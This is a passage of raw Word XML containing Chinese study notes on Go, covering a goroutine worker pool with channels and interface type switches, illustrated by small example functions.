        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个协程处理任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C47A145" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> **/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33027ABB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for i := 0; i &lt; workers; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012B2749" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> struct{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>struct{}{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>才是实例化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8EDCB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">go func( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>done chan &lt;- struct{}</w:t>
      </w:r>
      <w:r>
        <w:t>, jobs &lt;- chan job){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5E6A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>for job := range jobs {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5E13B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>job.do()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03265FA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722FF775" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>done &lt;- struct{}{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35353E64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">}( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:r>
        <w:t>, jobs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A748AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C50EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D91E11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69632BB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:t>查看任务是否完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C911EDE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> **/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0659E924" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>go func( done &lt;- chan struct{}, results chan result){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4251D049" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>for i := 0; i &lt; workers; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B061ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>&lt;-done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A9A009" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D3211" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>close(results)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>任务结束后，记得关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">result chan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>这个通道</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2683E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}( done, results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629E1013" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DB91BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56726AD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:t>取出结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E79342F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> **/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD3E1DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for result := range results {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8CBF9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Printf("done: %s,%d,%s\n", result.jobname, result.resultcode, result.resultinfo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9FCC32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C694BD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8F615A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func (job job) do() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D96A943" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>fmt.Printf("... doing work in [%s]\n", job.jobname)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E85AF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F57CBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>模拟处理结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBF0014" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if job.jobname == "8" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D72D98E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>job.results &lt;- result{job.jobname, 0, "ok"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A10F1B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77156D6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>job.results &lt;- result{job.jobname, -1, "error"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C13726C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611956E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427A234" w14:textId="7E66095B" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC69075" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA0BBB5" w14:textId="78BACD94" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="311" w:name="_Toc159779769"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidR="00482427">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：泛型、接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="311"/>
    </w:p>
    <w:p w14:paraId="274DFB7A" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考文献</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://juejin.cn/post/6844904168562360333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B5405F" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45738089" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前我认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">interface </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的用处有两种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B16E3B4" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数接收参数，然后再用类型判断或反射的方法进行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382A6BB9" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>提前</w:t>
      </w:r>
      <w:r w:rsidRPr="007F651C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>同名类型的</w:t>
      </w:r>
      <w:r w:rsidRPr="007F651C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>成员函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后可以成为</w:t>
      </w:r>
      <w:r w:rsidRPr="007F651C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不同实例对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>声明类型后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="007F651C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>统一的调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="007F651C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>成员方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E737172" w14:textId="77777777" w:rsidR="0060025F" w:rsidRPr="004434AD" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD40911" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6CA52D" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口类型的识别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05095437" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func parseID(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>id interface{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) (string, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F0838B" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">switch v := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>id.(type)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F342DE" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>case int:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1958EA2F" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return strconv.Itoa(v), nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031CD502" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>case string:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04246F98" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return v, nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D9C0BD" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C3C4B4" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return "", fmt.Errorf("invalid ID type %#v, the ID must be an int or a string", id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615E04DC" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED4C34" w14:textId="548D9606" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C13A7F" w14:textId="4DEDFD91" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F83A02B" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A46970" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396DC308" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Value.(type)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：获得类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DFDF79" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func Get_name(get Get) string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218D0F6F" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>switch get.(type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B95CD12" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
